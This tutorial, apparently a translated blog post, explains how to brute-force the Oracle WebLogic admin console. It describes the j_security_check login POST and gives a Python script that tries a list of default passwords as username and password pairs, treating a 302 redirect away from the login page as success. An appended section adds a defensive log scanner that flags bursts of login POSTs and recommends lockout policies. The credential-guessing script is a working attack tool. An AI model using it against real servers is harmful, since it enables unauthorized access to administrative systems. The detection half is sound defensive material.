1. WebLogic installation http://www.cnblogs.com/0x4D75/p/8916428.html
2. WebLogic weak password
Commonly used WebLogic weak passwords: https://cirt.net/passwords?criteria=weblogic
Admin console login address: http://192.168.136.130:7001/console/login/LoginForm.jsp
0. Ideas
The WebLogic admin console login page places no limit on the number of login attempts, so a script can be written to brute-force it.
Enter an arbitrary username and password on the login page and watch the submission in the browser's network panel.
After the submit button is clicked, the browser POSTs the form to http://192.168.136.130:7001/console/j_security_check with these fields:
j_username: web
j_password: logic
j_character_encoding: UTF-8
If the credentials are wrong, the server returns the address of the login page.
If they are correct, it returns a new address.
The brute-force script follows from this.
1. Python brute-force script
Full script: https://github.com/b4zinga/Explib/blob/master/weblogic.py
Key code:
    import requests

    def weakPasswd(self):
        """weak password"""
        pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem']
        # Every entry is tried as both a username and a password
        for user in pwddict:
            for pwd in pwddict:
                data = {
                    'j_username': user,
                    'j_password': pwd,
                    'j_character_encoding': 'UTF-8'
                }
                # allow_redirects=False keeps the 302 itself so it can be inspected
                req = requests.post(self.url+':7001/console/j_security_check', data=data, allow_redirects=False, verify=False)
                # A 302 that does not point back to LoginForm.jsp is treated as a successful login
                if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
                    print('[+] WebLogic username: '+user+' password: '+pwd)
                    return True
        return False
2. Tips
When Python's requests module sends a POST or GET and the response is a 302, requests follows the redirect by default. The outcome is hard to judge after the redirect, so pass the allow_redirects=False parameter to requests so that it does not follow the redirect.
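The same request pattern seen from the defender's side, as an added example that is not part of the original post or the linked script: it scans HTTP access-log lines for many POSTs to /console/j_security_check from one source inside a short window. The Common Log Format layout, the thresholds, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed layout (Common Log Format): host ident user [time] "METHOD path PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
LOGIN_PATH = "/console/j_security_check"  # login POST target named on this page

def find_bruteforce(lines, max_attempts=5, window_s=60):
    """Return {source: peak count} for sources that sent more than
    max_attempts login POSTs inside any window_s-second sliding window."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)  # source -> timestamps still inside the window
    flagged = {}
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line
        src, ts, method, path, _status = m.groups()
        # Drop any ;jsessionid=... or ?query suffix before comparing the path
        if method != "POST" or re.split(r"[;?]", path)[0] != LOGIN_PATH:
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        q = recent[src]
        q.append(when)
        while when - q[0] > window:
            q.popleft()
        # The status code is not used: a guessing run shows up as volume,
        # whatever the server answers to each attempt.
        if len(q) > max_attempts:
            flagged[src] = max(flagged.get(src, 0), len(q))
    return flagged

def sample_log():
    """Constructed sample: one noisy source and one ordinary admin login."""
    lines = [f'192.0.2.10 - - [01/May/2018:10:00:{i:02d} +0800] '
             f'"POST /console/j_security_check HTTP/1.1" 302 300'
             for i in range(12)]  # 12 login POSTs in 12 seconds
    lines.append('192.0.2.20 - - [01/May/2018:10:00:05 +0800] '
                 '"GET /console/login/LoginForm.jsp HTTP/1.1" 200 3000')
    lines.append('192.0.2.20 - - [01/May/2018:10:00:09 +0800] '
                 '"POST /console/j_security_check HTTP/1.1" 302 300')
    return lines

if __name__ == "__main__":
    for src, n in find_bruteforce(sample_log()).items():
        print(f"possible brute force from {src}: {n} login POSTs within 60s")
```

Because the console itself does not limit attempts, a check like this is most useful alongside an account lockout policy and restricted network access to port 7001.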